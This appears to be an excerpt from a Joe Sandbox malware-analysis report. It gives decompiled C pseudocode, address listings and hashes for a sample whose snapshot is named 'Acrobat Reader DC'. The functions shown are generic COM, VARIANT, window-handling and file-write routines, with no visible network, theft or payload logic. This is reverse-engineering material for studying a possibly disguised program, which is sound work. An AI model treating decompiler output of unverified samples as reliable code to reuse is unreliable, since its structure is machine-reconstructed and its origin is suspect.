												 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30))))(_t183,  *_v8,  &_v16, 0, 0, 0);
												_t254 = _v8;
												__eflags =  *(_t254 + 0x10) & 0x00000003;
												if(( *(_t254 + 0x10) & 0x00000003) == 0) {
													L26:
													__imp__#6(_v16);
													_t190 = _a4;
													 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x50))))(_t190, _v8);
													_t192 = _v12;
													_t313 = 1 + _t313;
													_v8 = 0;
													__eflags = _t313 -  *((intOrPtr*)(_t192 + 0x2c));
													if(_t313 <  *((intOrPtr*)(_t192 + 0x2c))) {
														continue;
													} else {
														goto L30;
													}
												} else {
													_t194 = lstrcmpiW(_v16, _a12);
													__eflags = _t194;
													if(_t194 == 0) {
														__imp__#6(_v16);
														goto L30;
													} else {
														goto L26;
													}
												}
												goto L51;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x4c))))(_t183, _v12);
											E00430EAD( &_a4);
											return _t309;
										}
									} else {
										__imp__#6(_v16);
										_v20 = _t306;
										goto L15;
									}
								}
							} else {
								__eflags =  *(_t227 + 0x36) & 0x00000040;
								if(( *(_t227 + 0x36) & 0x00000040) == 0) {
									goto L12;
								} else {
									_t195 = _a4;
									 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 0x4c))))(_t195, _t227);
									_t198 = _a4;
									_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x20))))(_t198, 0xffffffff,  &_v24);
									__eflags = _t200;
									if(_t200 < 0) {
										L8:
										E00430EAD( &_a4);
										return 0x80004005;
									} else {
										_t201 = _a4;
										_v16 = 0;
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t201 + 0x38))))(_t201, _v24,  &_v16);
										if(__eflags >= 0) {
											E00441E8D(__eflags,  &_a4,  &_v16);
											_t205 = _a4;
											_t314 =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))(_t205,  &_v12);
											__eflags = _t314;
											if(_t314 >= 0) {
												E00430EAD( &_v16);
												goto L12;
											} else {
												E00430EAD( &_v16);
												E00430EAD( &_a4);
												return _t314;
											}
										} else {
											E00430EAD( &_v16);
											goto L8;
										}
									}
								}
							}
						}
					} else {
						E00430EAD( &_a4);
						return 0x80004001;
					}
				} else {
					L1:
					E00430EAD( &_a4);
					return _t310;
				}
				L51:
			}




























































                                  0x00451d31
                                  0x00451d35
                                  0x00451d3a
                                  0x00451d48
                                  0x00451d4b
                                  0x00451d56
                                  0x00451d5e
                                  0x00451d62
                                  0x00452107
                                  0x0045210c
                                  0x0045210e
                                  0x00451d7a
                                  0x00451d80
                                  0x00451d90
                                  0x00451d92
                                  0x00451d94
                                  0x00000000
                                  0x00451d96
                                  0x00451d96
                                  0x00451d99
                                  0x00451d9d
                                  0x00451e50
                                  0x00451e50
                                  0x00451e5c
                                  0x00451e6a
                                  0x00451e6c
                                  0x00451e6e
                                  0x00451ea0
                                  0x00451ea0
                                  0x00451ea5
                                  0x00451ea7
                                  0x00451eab
                                  0x00000000
                                  0x00451eb1
                                  0x00451eb1
                                  0x00451eb1
                                  0x00451ec4
                                  0x00451ec6
                                  0x00451ec8
                                  0x00000000
                                  0x00000000
                                  0x00451eca
                                  0x00451ecd
                                  0x00451ed1
                                  0x00451ede
                                  0x00451ede
                                  0x00451ee8
                                  0x00451eea
                                  0x00451eed
                                  0x00451eee
                                  0x00451ef5
                                  0x00451ef9
                                  0x00000000
                                  0x00451efb
                                  0x00000000
                                  0x00451efb
                                  0x00451ed3
                                  0x00451ed5
                                  0x00451ed8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00451ed8
                                  0x00000000
                                  0x00451ed1
                                  0x00451f00
                                  0x00451f0d
                                  0x00451f13
                                  0x00451f20
                                  0x00451f20
                                  0x00451e70
                                  0x00451e70
                                  0x00451e7d
                                  0x00451e7f
                                  0x00451e89
                                  0x00451e8b
                                  0x00451e8d
                                  0x00451f21
                                  0x00451f26
                                  0x00451f2a
                                  0x00451fd1
                                  0x00451fd1
                                  0x00451fde
                                  0x00451fe0
                                  0x00451fe3
                                  0x00451fe5
                                  0x00451fe7
                                  0x00000000
                                  0x00451fed
                                  0x00451fed
                                  0x00451ff1
                                  0x00451ff5
                                  0x0045201a
                                  0x00452020
                                  0x00452023
                                  0x00452026
                                  0x00452028
                                  0x00452028
                                  0x0045202b
                                  0x0045202b
                                  0x0045202e
                                  0x00452033
                                  0x00452035
                                  0x00452038
                                  0x0045203b
                                  0x00452044
                                  0x00452044
                                  0x00452048
                                  0x0045204b
                                  0x0045204b
                                  0x0045204e
                                  0x00452052
                                  0x0045205b
                                  0x0045205b
                                  0x0045205f
                                  0x00452062
                                  0x00452062
                                  0x00452065
                                  0x00452069
                                  0x00452077
                                  0x0045207a
                                  0x0045207d
                                  0x0045207d
                                  0x0045208c
                                  0x00452093
                                  0x00452094
                                  0x00452097
                                  0x0045209a
                                  0x0045209d
                                  0x0045209d
                                  0x0045202b
                                  0x004520a1
                                  0x004520a5
                                  0x004520a8
                                  0x004520ab
                                  0x004520ad
                                  0x00000000
                                  0x004520b4
                                  0x00000000
                                  0x00000000
                                  0x004520bb
                                  0x00000000
                                  0x00000000
                                  0x004520c2
                                  0x00000000
                                  0x00000000
                                  0x004520c6
                                  0x00000000
                                  0x00000000
                                  0x004520ad
                                  0x004520cb
                                  0x004520ce
                                  0x004520d5
                                  0x004520dc
                                  0x004520e0
                                  0x004520e3
                                  0x004520ed
                                  0x004520f3
                                  0x004520fa
                                  0x00452100
                                  0x00451ff7
                                  0x00451ff7
                                  0x00452001
                                  0x00452007
                                  0x00452017
                                  0x00452017
                                  0x00451ff5
                                  0x00451f30
                                  0x00451f30
                                  0x00451f30
                                  0x00451f43
                                  0x00451f45
                                  0x00451f48
                                  0x00451f4a
                                  0x00451f4c
                                  0x00000000
                                  0x00000000
                                  0x00451f62
                                  0x00451f64
                                  0x00451f67
                                  0x00451f6b
                                  0x00451f7f
                                  0x00451f83
                                  0x00451f89
                                  0x00451f96
                                  0x00451f98
                                  0x00451f9b
                                  0x00451f9c
                                  0x00451fa3
                                  0x00451fa7
                                  0x00000000
                                  0x00451fa9
                                  0x00000000
                                  0x00451fa9
                                  0x00451f6d
                                  0x00451f75
                                  0x00451f7b
                                  0x00451f7d
                                  0x00451fcb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00451f7d
                                  0x00000000
                                  0x00451f6b
                                  0x00451fb3
                                  0x00451fb9
                                  0x00451fc6
                                  0x00451fc6
                                  0x00451e93
                                  0x00451e97
                                  0x00451e9d
                                  0x00000000
                                  0x00451e9d
                                  0x00451e8d
                                  0x00451da3
                                  0x00451da3
                                  0x00451da7
                                  0x00000000
                                  0x00451dad
                                  0x00451dad
                                  0x00451db7
                                  0x00451db9
                                  0x00451dc8
                                  0x00451dca
                                  0x00451dcc
                                  0x00451df5
                                  0x00451df9
                                  0x00451e09
                                  0x00451dce
                                  0x00451dce
                                  0x00451dd8
                                  0x00451de8
                                  0x00451dea
                                  0x00451e12
                                  0x00451e17
                                  0x00451e26
                                  0x00451e28
                                  0x00451e2a
                                  0x00451e4b
                                  0x00000000
                                  0x00451e2c
                                  0x00451e30
                                  0x00451e39
                                  0x00451e46
                                  0x00451e46
                                  0x00451dec
                                  0x00451df0
                                  0x00000000
                                  0x00451df0
                                  0x00451dea
                                  0x00451dcc
                                  0x00451da7
                                  0x00451d9d
                                  0x00452114
                                  0x00452118
                                  0x00452128
                                  0x00452128
                                  0x00451d68
                                  0x00451d68
                                  0x00451d6c
                                  0x00451d79
                                  0x00451d79
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E00479500(short* __ecx, void* __fp0, char _a4, intOrPtr _a12) {
				char _v28;
				char _v52;
				short* __edi;
				char* __esi;
				signed int _t32;
				void* _t39;
				void* _t46;
				short* _t47;
				void* _t50;

				_t47 = __ecx;
				__imp__#8(__ecx, _t46, _t50, _t39);
				_t32 = _a12 - 1;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				if(_t32 > 0xb) {
					L17:
					E00408F40(_t47,  &_a4);
					return _t47;
				} else {
					switch( *((intOrPtr*)(_t32 * 4 +  &M004796E4))) {
						case 0:
							__eax = 3;
							__ecx =  &_a4;
							 *__edi = __ax;
							__eax = E0040C650( &_a4);
							goto L16;
						case 1:
							__eax =  &_a4;
							__edx = 0x14;
							 *__edi = __dx;
							__eax = E00443006( &_a4);
							 *((intOrPtr*)(__edi + 0xc)) = __edx;
							goto L16;
						case 2:
							__ecx = 5;
							 *__edi = __cx;
							__ecx =  &_a4;
							__eax = E0040BAA0( &_a4);
							 *((long long*)(__edi + 8)) = __fp0;
							__esi =  &_a4;
							E00408F40(__edi,  &_a4) = __edi;
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __edi;
							goto L18;
						case 3:
							__ecx =  &_a4;
							__eax = 8;
							 *__edi = __ax;
							__eax = E0045340C( &_a4);
							_push(__eax);
							__imp__#2();
							goto L16;
						case 4:
							__esp = __esp - 0x10;
							__edx = 0x200c;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __dx;
							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
							__eax = E00479362(__eflags, __fp0);
							goto L16;
						case 5:
							__eax =  &_a4;
							__eax = E00432508( &_a4);
							__esp = __esp - 0x10;
							__ebx = __esp;
							__eax = E0040B960(__eax, __esp, __ecx, __edi);
							__ecx =  &_v28;
							E00479500( &_v28, __fp0) = E00437063(__edi, __eax);
							__ecx =  &_v52;
							_push( &_v52);
							__imp__#9();
							__esi =  &_a4;
							E00408F40(__edi,  &_a4) = __edi;
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __edi;
							goto L18;
						case 6:
							__edx =  &_a4;
							__ecx = 0x13;
							 *__edi = __cx;
							__eax = E0044B3AC( &_a4);
							goto L16;
						case 7:
							__eax = _a4;
							__eflags = __eax;
							if(__eax == 0) {
								goto L17;
							} else {
								_push(__eax);
								_push(__edi);
								__imp__#10();
								__esi =  &_a4;
								E00408F40(__edi,  &_a4) = __edi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __edi;
							}
							goto L18;
						case 8:
							 *__ecx = 0xb;
							 *((short*)(_t47 + 8)) = E00442F4C( &_a4) & 0x000000ff;
							E00408F40(_t47,  &_a4);
							return _t47;
							goto L18;
						case 9:
							__edx =  &_a4;
							__eax = E0044CECD( &_a4);
							__eflags = __al;
							if(__al == 0) {
								goto L14;
							} else {
								__eax = 0xa;
								__esi =  &_a4;
								 *__edi = __ax;
								 *((intOrPtr*)(__edi + 8)) = 0x80020004;
								E00408F40(__edi,  &_a4) = __edi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __edi;
							}
							goto L18;
						case 0xa:
							L14:
							__esp = __esp - 0x10;
							__ecx = 0x2011;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __cx;
							__eax = E0040B960( &_a4, __esp, 0x2011, __edi);
							__eax = E00473B76(__eflags);
							goto L16;
						case 0xb:
							__esp = __esp - 0x10;
							__edx = 0x2013;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __dx;
							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
							__eax = E0044CE43(__ecx, __eflags);
							L16:
							 *((intOrPtr*)(__edi + 8)) = __eax;
							goto L17;
					}
				}
				L18:
			}












                                  0x0047950c
                                  0x0047950f
                                  0x0047951a
                                  0x0047951b
                                  0x0047951e
                                  0x00479524
                                  0x004796d1
                                  0x004796d4
                                  0x004796e1
                                  0x0047952a
                                  0x0047952a
                                  0x00000000
                                  0x0047955c
                                  0x00479561
                                  0x00479564
                                  0x00479567
                                  0x00000000
                                  0x00000000
                                  0x00479597
                                  0x0047959a
                                  0x004795a0
                                  0x004795a3
                                  0x004795a8
                                  0x00000000
                                  0x00000000
                                  0x00479571
                                  0x00479576
                                  0x00479579
                                  0x0047957c
                                  0x00479581
                                  0x00479584
                                  0x0047958c
                                  0x0047958e
                                  0x0047958f
                                  0x00479590
                                  0x00479594
                                  0x00000000
                                  0x00000000
                                  0x004795c6
                                  0x004795c9
                                  0x004795cf
                                  0x004795d2
                                  0x004795d7
                                  0x004795d8
                                  0x00000000
                                  0x00000000
                                  0x004795e3
                                  0x004795e6
                                  0x004795eb
                                  0x004795ee
                                  0x004795f0
                                  0x004795f3
                                  0x004795f8
                                  0x00000000
                                  0x00000000
                                  0x00479628
                                  0x0047962c
                                  0x00479631
                                  0x00479634
                                  0x00479636
                                  0x0047963b
                                  0x00479646
                                  0x0047964b
                                  0x0047964f
                                  0x00479650
                                  0x00479656
                                  0x0047965e
                                  0x00479660
                                  0x00479661
                                  0x00479662
                                  0x00479666
                                  0x00000000
                                  0x00000000
                                  0x004795b0
                                  0x004795b3
                                  0x004795b9
                                  0x004795bc
                                  0x00000000
                                  0x00000000
                                  0x00479602
                                  0x00479605
                                  0x00479607
                                  0x00000000
                                  0x0047960d
                                  0x0047960d
                                  0x0047960e
                                  0x0047960f
                                  0x00479615
                                  0x0047961d
                                  0x0047961f
                                  0x00479620
                                  0x00479621
                                  0x00479625
                                  0x00479625
                                  0x00000000
                                  0x00000000
                                  0x0047953a
                                  0x00479548
                                  0x0047954c
                                  0x00479559
                                  0x00000000
                                  0x00000000
                                  0x00479669
                                  0x0047966d
                                  0x00479672
                                  0x00479674
                                  0x00000000
                                  0x00479676
                                  0x00479676
                                  0x0047967b
                                  0x0047967e
                                  0x00479681
                                  0x0047968d
                                  0x0047968f
                                  0x00479690
                                  0x00479691
                                  0x00479695
                                  0x00479695
                                  0x00000000
                                  0x00000000
                                  0x00479698
                                  0x00479698
                                  0x0047969b
                                  0x004796a0
                                  0x004796a3
                                  0x004796a5
                                  0x004796a8
                                  0x004796ad
                                  0x00000000
                                  0x00000000
                                  0x004796b4
                                  0x004796b7
                                  0x004796bc
                                  0x004796bf
                                  0x004796c1
                                  0x004796c4
                                  0x004796c9
                                  0x004796ce
                                  0x004796ce
                                  0x00000000
                                  0x00000000
                                  0x0047952a
                                  0x00000000

                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004499DB(void* __eflags, signed int _a4, signed int _a8, int _a12, int _a16, int _a20) {
				struct tagPOINT _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				long _v28;
				signed int _t57;
				signed int _t58;
				struct HWND__* _t59;
				int _t61;
				int _t64;
				intOrPtr _t69;
				struct HWND__*** _t70;
				struct HWND__** _t71;
				struct HWND__** _t75;
				int _t78;
				int _t79;
				intOrPtr _t83;
				intOrPtr _t84;
				struct tagRECT* _t85;
				signed int _t86;
				int _t87;
				signed int _t88;
				struct HWND__** _t91;
				long _t95;
				struct HWND__** _t104;
				struct HWND__** _t107;

				_t78 = _a8;
				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_a4) != 0) {
					_t83 =  *0x4a8690; // 0x0
					_t57 = _a4;
					_t84 =  *0x4a86a4; // 0xa51ad0
					_t107 =  *( *(_t83 + _a8 * 4));
					_t58 = _t57 | 0xffffffff;
					_t104 =  *( *(_t84 + _t57 * 4));
					__eflags = _t78 - _t58;
					if(_t78 != _t58) {
						L6:
						_t59 =  *_t104;
						_t85 =  &_v28;
						_a8 = _t59;
						GetWindowRect(_t59, _t85);
						_t95 = _v28;
						_t86 = _t85 | 0xffffffff;
						__eflags = _a16 - _t86;
						if(_a16 == _t86) {
							_t75 = _v20 - _t95;
							__eflags = _t75;
							_a16 = _t75;
						}
						_t61 = _v24;
						__eflags = _a20 - _t86;
						if(_a20 == _t86) {
							_t91 = _v16 - _t61;
							__eflags = _t91;
							_a20 = _t91;
						}
						_v12.x = _t95;
						_v12.y = _t61;
						ScreenToClient( *_t107,  &_v12);
						__eflags = _t78 - 0xffffffff;
						if(_t78 == 0xffffffff) {
							_t78 = _v12.x;
						}
						_t64 = _a12;
						__eflags = _t64 - 0xffffffff;
						if(_t64 == 0xffffffff) {
							_t64 = _v12.y;
						}
						_t87 = _a16;
						_t107[0x16] = _t78;
						_t107[0x17] = _t64;
						_t107[0x18] = _t87;
						_t107[0x19] = _a20;
						__eflags = _t104[0x20] - _t78;
						if(_t104[0x20] != _t78) {
							L19:
							_t79 = _a8;
							MoveWindow(_t79, _t78, _t64, _t87, _a20, 1);
							E0043028B(_t107, _t104, 1);
							_t88 = 3;
							__eflags = _t104[0x22] - 3;
							if(_t104[0x22] == 3) {
								_a20 = 3;
								__eflags =  *0x4a86b4 - _t88; // 0x2
								if(__eflags >= 0) {
									do {
										_t69 =  *0x4a86a4; // 0xa51ad0
										_t70 =  *(_t69 + _t88 * 4);
										__eflags =  *_t70;
										if( *_t70 != 0) {
											_t71 =  *_t70;
											__eflags = _t71[1] - _t107[1];
											if(_t71[1] == _t107[1]) {
												__eflags = _t71[0x22] - 0x16;
												if(_t71[0x22] == 0x16) {
													__eflags = _t71[0xc] - _t79;
													if(_t71[0xc] == _t79) {
														SendMessageW( *_t71, 0x469, _t79, 0);
														_t88 = _a20;
													}
												}
											}
										}
										_t88 = _t88 + 1;
										_a20 = _t88;
										__eflags = _t88 -  *0x4a86b4; // 0x2
									} while (__eflags <= 0);
								}
							}
							E00430B87(_t107, _t104, 1);
						} else {
							__eflags = _t104[0x20] - _t64;
							if(_t104[0x20] != _t64) {
								goto L19;
							} else {
								__eflags = _t104[0x21] - _t87;
								if(_t104[0x21] != _t87) {
									goto L19;
								} else {
									__eflags = _t104[0x21] - _a20;
									if(_t104[0x21] != _a20) {
										_t87 = _a16;
										goto L19;
									}
								}
							}
						}
					} else {
						__eflags = _a12 - _t58;
						if(_a12 != _t58) {
							goto L6;
						} else {
							__eflags = _a16 - _t58;
							if(_a16 != _t58) {
								goto L6;
							} else {
								__eflags = _a20 - _t58;
								if(_a20 != _t58) {
									goto L6;
								}
							}
						}
					}
					return 1;
				} else {
					return 0;
				}
			}





























                                  0x004499e5
                                  0x004499fd
                                  0x00449a0b
                                  0x00449a14
                                  0x00449a17
                                  0x00449a1e
                                  0x00449a23
                                  0x00449a27
                                  0x00449a29
                                  0x00449a2b
                                  0x00449a40
                                  0x00449a40
                                  0x00449a42
                                  0x00449a47
                                  0x00449a4a
                                  0x00449a50
                                  0x00449a53
                                  0x00449a56
                                  0x00449a59
                                  0x00449a5e
                                  0x00449a5e
                                  0x00449a60
                                  0x00449a60
                                  0x00449a63
                                  0x00449a66
                                  0x00449a69
                                  0x00449a6e
                                  0x00449a6e
                                  0x00449a70
                                  0x00449a70
                                  0x00449a73
                                  0x00449a79
                                  0x00449a80
                                  0x00449a86
                                  0x00449a89
                                  0x00449a8b
                                  0x00449a8b
                                  0x00449a8e
                                  0x00449a91
                                  0x00449a94
                                  0x00449a96
                                  0x00449a96
                                  0x00449a9c
                                  0x00449a9f
                                  0x00449aa2
                                  0x00449aa5
                                  0x00449aa8
                                  0x00449ab2
                                  0x00449ab4
                                  0x00449adf
                                  0x00449ae8
                                  0x00449aec
                                  0x00449af6
                                  0x00449afb
                                  0x00449b00
                                  0x00449b06
                                  0x00449b08
                                  0x00449b0b
                                  0x00449b11
                                  0x00449b1b
                                  0x00449b1b
                                  0x00449b20
                                  0x00449b23
                                  0x00449b26
                                  0x00449b28
                                  0x00449b2d
                                  0x00449b30
                                  0x00449b32
                                  0x00449b39
                                  0x00449b3b
                                  0x00449b3e
                                  0x00449b4b
                                  0x00449b51
                                  0x00449b51
                                  0x00449b3e
                                  0x00449b39
                                  0x00449b30
                                  0x00449b54
                                  0x00449b55
                                  0x00449b58
                                  0x00449b58
                                  0x00449b1b
                                  0x00449b11
                                  0x00449b64
                                  0x00449ab6
                                  0x00449abd
                                  0x00449abf
                                  0x00000000
                                  0x00449ac1
                                  0x00449ac8
                                  0x00449aca
                                  0x00000000
                                  0x00449acc
                                  0x00449ad3
                                  0x00449ad6
                                  0x00449adc
                                  0x00000000
                                  0x00449adc
                                  0x00449ad6
                                  0x00449aca
                                  0x00449abf
                                  0x00449a2d
                                  0x00449a2d
                                  0x00449a30
                                  0x00000000
                                  0x00449a32
                                  0x00449a32
                                  0x00449a35
                                  0x00000000
                                  0x00449a37
                                  0x00449a37
                                  0x00449a3a
                                  0x00000000
                                  0x00000000
                                  0x00449a3a
                                  0x00449a35
                                  0x00449a30
                                  0x00449b74
                                  0x004499ff
                                  0x00449a05
                                  0x00449a05

                                  APIs
                                  • GetWindowRect.USER32 ref: 00449A4A
                                  • ScreenToClient.USER32 ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0041415F(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
									if(_t78 < _v12) {
										_t65 = E00418F98(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E00414139(_t96));
										_t71 = E0041B7B2(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E0041443C(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E00410E60( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
